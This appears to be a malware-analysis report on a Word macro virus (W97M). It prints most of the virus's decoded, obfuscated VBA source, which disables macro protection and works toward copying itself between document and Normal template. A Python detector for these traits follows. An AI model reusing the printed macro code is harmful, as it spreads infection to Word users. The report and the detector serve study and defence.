Verdict: MALICIOUS (Risk Score 120)

Malware Insights

The file is identified as malicious by ClamAV with the signature Win.Trojan.W97M-8. It contains a VBA Document_Open macro, so its code runs as soon as the document is opened in Word. The macro first disables Word's macro virus protection (Application.Options.VirusProtection = False), disables auto-macros (WordBasic.DisableAutoMacros 0), blocks Ctrl+Break so the user cannot interrupt it (Application.EnableCancelKey = wdCancelDisabled) and suppresses the prompt to save changes to the Normal template (Options.SaveNormalPrompt = False). The extracted source then compares the line counts of the active document's and the Normal template's VBA modules, selects one as source and the other as target, and builds a fresh copy of its own Document_Open code in which every identifier, taken from a comment block that lists all of them, is replaced with a random name made of characters with codes 130 and above (the mojibake identifiers in the preview are the result of an earlier such pass). That is the behaviour of a polymorphic Word macro virus that propagates between the document and the Normal template, consistent with the W97M classification; the preview is truncated before the point where the rebuilt code would be written back, so the replication step itself is not visible on this page.

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
Heuristics (3)

- ClamAV: Win.Trojan.W97M-8 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.W97M-8
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro, which Word executes automatically when the document is opened
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 29569 bytes | 819d6645445078a8dc2e9910b451960af5710dc7ea3a527dda67ff482f1d19a5 |
Preview script (first 1,000 lines of the extracted script; the page truncates it):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
¤õ´‰ÁíîÛ“¼‘Ìàì…ôôß…ß©«¾¢¢ˆÑ¢……ƨåڥâԺœï = "´˜Ä¶ŸÂõ§ö¢ïç"
ß×ù•´ºê‚ = ActiveDocument.VBProject.VBComponents(1).CodeModule.countoflines
™•µŒð�ÑâˆâàÝ÷ß = NormalTemplate.VBProject.VBComponents(1).CodeModule.countoflines
Application.Options.VirusProtection = False
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.SaveNormalPrompt = False
If ß×ù•´ºê‚ > 169 And ™•µŒð�ÑâˆâàÝ÷ß > 169 Then Exit Sub
If ™•µŒð�ÑâˆâàÝ÷ß > 169 Then
Set �‰¬�¨¢Ë†ÂßÀ¦Œî¾�Ó“›èŪ»ôæ�éó = ActiveDocument
Set ‡Óµ½’ùé„�� = NormalTemplate
GoTo •ŠÊ¨Ä ÖÌÓÙ£¡µˆÁÀÒé§’ë ±å
End If
If ™•µŒð�ÑâˆâàÝ÷ß < 170 Then
Set �‰¬�¨¢Ë†ÂßÀ¦Œî¾�Ó“›èŪ»ôæ�éó = NormalTemplate
Set ‡Óµ½’ùé„�� = ActiveDocument
End If
ReDim ƒê¶—Ð(50, 50)
¸£ƒ‡ÅÍ×Äè×ŽÌ = ‡Óµ½’ùé„��.VBProject.VBComponents(1).CodeModule.countoflines
ß×ù•´ºê‚ = 0
Do Until ß×ù•´ºê‚ = ¸£ƒ‡ÅÍ×Äè×ŽÌ
ß×ù•´ºê‚ = ß×ù•´ºê‚ + 1
ä�Ã÷�Ð÷Ô = ‡Óµ½’ùé„��.VBProject.VBComponents(1).CodeModule.Lines(ß×ù•´ºê‚, 1)
If Left(ä�Ã÷�Ð÷Ô, 1) = "'" Then
ßùŽ äÙ‡áÕÄÅò = Len(ä�Ã÷�Ð÷Ô)
ä�Ã÷�Ð÷Ô = Mid(ä�Ã÷�Ð÷Ô, 2, ßùŽ äÙ‡áÕÄÅò)
Ü = ""
Ê®· = Len(ä�Ã÷�Ð÷Ô)
Randomize Timer
Ò–À½¡ÑµÎŠÐØ�‡£®×ÂŽ½Éס´²:
êµ—èùÙ×ß¹Èö¶ˆ£ = CInt(Rnd * 30) + 1
For ݈ä �¿…ìÔ = 1 To êµ—èùÙ×ß¹Èö¶ˆ£
'™•µŒð�ÑâˆâàÝ÷ß
'�‰¬�¨¢Ë†ÂßÀ¦Œî¾�Ó“›èŪ»ôæ�éó
'‡Óµ½’ùé„��
'Ò¶Ž¸šÌ¹×ô©œ–œð
'øŠòÓù ½œ
'³‘êîˆÈ�óøÎοÍï
'ÎÁ�à䢘¤ºøœÊÜÛ
'ß×ù•´ºê‚
'Š
'™Ìòç¿ð×—¤
'ì »ï½–Ð¹à·í¡Œà˜‘‡ß
'ßùŽ äÙ‡áÕÄÅò
'ó•¨èÀ‚±™ÙÓ‰Ãæ•¶Æá
'ž÷�
'Æï£¯ÎàºÇÎŒ£ˆä˜´õ—ííÈÕЈ²
'Ò–À½¡ÑµÎŠÐØ�‡£®×ÂŽ½Éס´²
'ìܷǪ¼�œÃ‰Ö�¤ÎŒ�¼¥„û÷ð”
'Ìõ·
'Ü¿ŠÏ‘Ô´˜ð
'Ê®·
'ä�Ã÷�Ð÷Ô
'Æî¨µŒ ƒ¥Ï§ÚÊ®ÆùÊ”ôÄá™°ÄñÄŠ
'׆ò玱éç¾´·³ŸËä¹õ¿Ð‹�ˆ°¹šÛ
'°Ó²³¨—³�Žß�ÆÍž÷ûÈÇ‘
'Ü¿ŠÏ‘Ô´˜ð
'ßùŽ äÙ‡áÕÄÅò
'Š
'§Ÿ§¼àöà™ææ�é–¹¡’¿ó´¶Éﱸœ“˜
'³‘êîˆÈ�óøÎοÍï
'¸£ƒ‡ÅÍ×Äè×ŽÌ
'Úé÷Éï²»ú¢§ö�‡Ú̉
'݈ä �¿…ìÔ
'™Ìòç¿ð×—¤
'�å΄�¯´Îñ�•¸˜
'àïü†¸
'稜»Ö¦Ýð
'ª£¨§©ôä«šÊøæû±™ð×ïÉŒû£»�
'õÄÈÎáÞÏäÖò¼ºŒìÙÚáç¶Ñí–š
' Ü
'‘•£™È“ᥲøÔ¨Ù‹§ç®í鄥䫒ÈÏ
'êµ—èùÙ×ß¹Èö¶ˆ£
'݈ä �¿…ìÔ
'ƒê¶—Ð
'À½
'ß×ù•´ºê‚
'°Ó²³¨—³�Žß�ÆÍž÷ûÈÇ‘
'ò‹ŸÍž¼ÎÄ̤²
'•ŠÊ¨Ä ÖÌÓÙ£¡µˆÁÀÒé§’ë ±å
'¤õ´‰ÁíîÛ“¼‘Ìàì…ôôß…ß©«¾¢¢ˆÑ¢……
õÄÈÎáÞÏäÖò¼ºŒìÙÚáç¶Ñí–š:
ò‹ŸÍž¼ÎÄ̤² = CInt(Rnd * 250) + 1
If ò‹ŸÍž¼ÎÄ̤² = 13 Then GoTo õÄÈÎáÞÏäÖò¼ºŒìÙÚáç¶Ñí–š
If ò‹ŸÍž¼ÎÄ̤² < 65 Then GoTo õÄÈÎáÞÏäÖò¼ºŒìÙÚáç¶Ñí–š
If ò‹ŸÍž¼ÎÄ̤² < 130 Then GoTo õÄÈÎáÞÏäÖò¼ºŒìÙÚáç¶Ñí–š
Ü = Ü & Chr(ò‹ŸÍž¼ÎÄ̤²)
Next ݈ä �¿…ìÔ
ª£¨§©ôä«šÊøæû±™ð×ïÉŒû£»� = ª£¨§©ôä«šÊøæû±™ð×ïÉŒû£»� + 1
ƒê¶—Ð(ª£¨§©ôä«šÊøæû±™ð×ïÉŒû£»�, 1) = ä�Ã÷�Ð÷Ô
ƒê¶—Ð(ª£¨§©ôä«šÊøæû±™ð×ïÉŒû£»�, 2) = Ü
End If
Loop
•ŠÊ¨Ä ÖÌÓÙ£¡µˆÁÀÒé§’ë ±å:
ß×ù•´ºê‚ = 1
§Ÿ§¼àöà™ææ�é–¹¡’¿ó´¶Éﱸœ“˜ = "Private Sub Document_Open()" & Chr(13)
If ™•µŒð�ÑâˆâàÝ÷ß < 170 Then
êµ—èùÙ×ß¹Èö¶ˆ£ = CInt(Rnd * 30) + 1
For ݈ä �¿…ìÔ = 1 To êµ—èùÙ×ß¹Èö¶ˆ£
�å΄�¯´Îñ�•¸˜:
Ü¿ŠÏ‘Ô´˜ð = CInt(Rnd * 250)
If Ü¿ŠÏ‘Ô´˜ð = 13 Then GoTo �å΄�¯´Îñ�•¸˜
If Ü¿ŠÏ‘Ô´˜ð < 65 Then GoTo �å΄�¯´Îñ�•¸˜
If Ü¿ŠÏ‘Ô´˜ð < 130 Then GoTo �å΄�¯´Îñ�•¸˜
Ü = Ü & Chr(Ü¿ŠÏ‘Ô´˜ð)
Next ݈ä �¿…ìÔ
êµ—èùÙ×ß¹Èö¶ˆ£ = CInt(Rnd * 20)
For ‘•£™È“ᥲøÔ¨Ù‹§ç®í鄥䫒ÈÏ = 1 To êµ—èùÙ×ß¹Èö¶ˆ£
àïü†¸:
Ü¿ŠÏ‘Ô´˜ð = CInt(Rnd * 250)
If Ü¿ŠÏ‘Ô´˜ð = 13 Then GoTo àïü†¸
If Ü¿ŠÏ‘Ô´˜ð = 34 Then GoTo àïü†¸
If Ü¿ŠÏ‘Ô´˜ð < 130 Then GoTo àïü†¸
°Ó²³¨—³�Žß�ÆÍž÷ûÈÇ‘ = °Ó²³¨—³�Žß�ÆÍž÷ûÈÇ‘ & Chr(Ü¿ŠÏ‘Ô´˜ð)
Next ‘•£™È“ᥲøÔ¨Ù‹§ç®í鄥䫒ÈÏ
§Ÿ§¼àöà™ææ�é–¹¡’¿ó´¶Éﱸœ“˜ = §Ÿ§¼àöà™ææ�é–¹¡’¿ó´¶Éﱸœ“˜ & Ü & "=" & Chr(34) & °Ó²³¨—³�Žß�ÆÍž÷ûÈÇ‘ & Chr(34) & Chr(13)
End If
ßùŽ äÙ‡áÕÄÅò = ‡Óµ½’ùé„��.VBProject.VBComponents(1).CodeModule.countoflines
For Š = 2 To ßùŽ äÙ‡áÕÄÅò
§Ÿ§¼àöà™ææ�é–¹¡’¿ó´¶Éﱸœ“˜ = §Ÿ§¼àöà™ææ�é–¹¡’¿ó´¶Éﱸœ“˜ & ‡Óµ½’ùé„��.VBProject.VBComponents(1).CodeModule.Lines(Š, 1) & Chr(13)
Next Š
If ™•µŒð�ÑâˆâàÝ÷ß > 169 Then GoTo ¤õ´‰ÁíîÛ“¼‘Ìàì…ôôß…ß©«¾¢¢ˆÑ¢……
Do
³‘êîˆÈ�óøÎοÍï = 0
¸£ƒ‡ÅÍ×Äè×ŽÌ = Len(§Ÿ§¼àöà™ææ�é–¹¡’¿ó´¶Éﱸœ“˜)
À½ = À½ + 1
If ƒê¶—Ð(À½, 1) = ... (truncated)
```
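The heuristics above (auto-exec trigger, VirusProtection/DisableAutoMacros tampering, VBProject self-inspection) can be reproduced on the decoded VBA text that olevba writes out as macros.bas. The following Python is an added example, not the analyzer's or oletools' own code; rule names, severities, weights and the verdict thresholds are assumptions chosen to resemble the report's labels (OLE_VBA_DOCOPEN and friends), and the two VBA samples are constructed here, with the malicious one cut down from the preview on this page. It goes a little beyond the page by also matching the other Word/Excel auto-exec entry points and by counting identifiers made of non-ASCII characters, which is the trace a random-rename engine like the one in the preview leaves behind.

```python
"""Static triage of decoded VBA source in the spirit of this report's heuristics.
Added example, not the analyzer's code: rule names, weights and thresholds are
assumptions, and it runs on olevba-style text so no Office file is needed."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    detail: str


SEVERITY_WEIGHT = {"low": 1, "medium": 3, "high": 6, "critical": 10}  # assumed

# The page shows Document_Open; the rest are the other entry points Word and
# Excel run without user interaction.
AUTOEXEC = (r"^\s*(?:Private\s+|Public\s+)?Sub\s+"
            r"(?:Document_Open|Document_Close|AutoOpen|AutoExec|AutoClose|"
            r"Workbook_Open|Auto_Open)\s*\(")

RULES = [  # (rule, severity, regex, description) - names are assumed
    ("OLE_VBA_DOCOPEN", "high", AUTOEXEC, "auto-executing macro entry point"),
    ("VBA_DISABLE_VIRUSPROTECTION", "high", r"\bVirusProtection\s*=\s*False\b",
     "turns off Word's macro virus protection"),
    ("VBA_DISABLE_AUTOMACROS", "high", r"\bDisableAutoMacros\b",
     "disables auto-macros through WordBasic"),
    ("VBA_DISABLE_CANCELKEY", "medium", r"\bEnableCancelKey\s*=\s*wdCancelDisabled\b",
     "stops the user breaking out of the macro"),
    ("VBA_SUPPRESS_NORMAL_PROMPT", "medium", r"\bSaveNormalPrompt\s*=\s*False\b",
     "saves Normal template changes without asking"),
    ("VBA_VBPROJECT_ACCESS", "high", r"\.VBProject\.VBComponents\b",
     "reads or writes VBA code modules (self-modifying/replicating)"),
    ("VBA_NORMAL_TEMPLATE", "medium", r"\bNormalTemplate\b",
     "touches the global Normal template"),
]

# Strings and ' comments are dropped before tokenising, so the comment block in
# which the virus lists its own names does not inflate the identifier count.
_LITERALS = re.compile(r'''"[^"\n]*"|'[^\n]*''')
_SPLIT = re.compile(r"[\s()=,&.:+*/<>\-]+")


def non_ascii_identifiers(code: str) -> set[str]:
    """Code tokens containing any character outside ASCII (Chr(130)+ names)."""
    tokens = _SPLIT.split(_LITERALS.sub(" ", code))
    return {t for t in tokens if t and any(ord(ch) > 127 for ch in t)}


def analyse(code: str) -> list[Finding]:
    findings = []
    for rule, severity, pattern, detail in RULES:
        m = re.search(pattern, code, re.IGNORECASE | re.MULTILINE)
        if m:
            findings.append(Finding(rule, severity, f"{detail}: {m.group(0).strip()}"))
    names = non_ascii_identifiers(code)
    if len(names) >= 3:  # assumed threshold
        findings.append(Finding("VBA_OBFUSCATED_IDENTIFIERS", "medium",
                                f"{len(names)} identifiers built from non-ASCII characters"))
    return findings


def risk_score(findings: list[Finding]) -> int:
    return sum(SEVERITY_WEIGHT[f.severity] for f in findings)


def verdict(findings: list[Finding]) -> str:
    """Assumed policy: an auto-exec trigger plus enough weight is malicious."""
    score = risk_score(findings)
    has_trigger = any(f.rule == "OLE_VBA_DOCOPEN" for f in findings)
    if has_trigger and score >= 15:
        return "MALICIOUS"
    if score >= 6:
        return "SUSPICIOUS"
    return "CLEAN"


# Constructed sample cut down from the preview on this page.
SAMPLE_VBA = r"""Attribute VB_Name = "ThisDocument"
Private Sub Document_Open()
ƨåڥâԺœï = "´˜Ä¶ŸÂõ§ö¢ïç"
ß×ù•´ºê‚ = ActiveDocument.VBProject.VBComponents(1).CodeModule.countoflines
™•µŒð = NormalTemplate.VBProject.VBComponents(1).CodeModule.countoflines
Application.Options.VirusProtection = False
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.SaveNormalPrompt = False
If ß×ù•´ºê‚ > 169 And ™•µŒð > 169 Then Exit Sub
'™•µŒð
'ß×ù•´ºê‚
End Sub
"""

# Constructed benign macro for comparison.
BENIGN_VBA = r"""Attribute VB_Name = "Module1"
Sub FormatReport()
    MsgBox "Paragraphs: " & ActiveDocument.Paragraphs.Count
End Sub
"""

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        found = analyse(src)
        print(f"{label}: {verdict(found)} (score {risk_score(found)})")
        for f in found:
            print(f"  [{f.severity}] {f.rule}: {f.detail}")
```

Run it as a script to see both verdicts; on real data, feed it the text of each module olevba extracts. The non-ASCII identifier count is the cheap signal worth keeping even if the regex rules are rewritten: a polymorphic engine that draws names from Chr(130) and above defeats signature matching on identifiers, but it cannot avoid producing identifiers that no human would type.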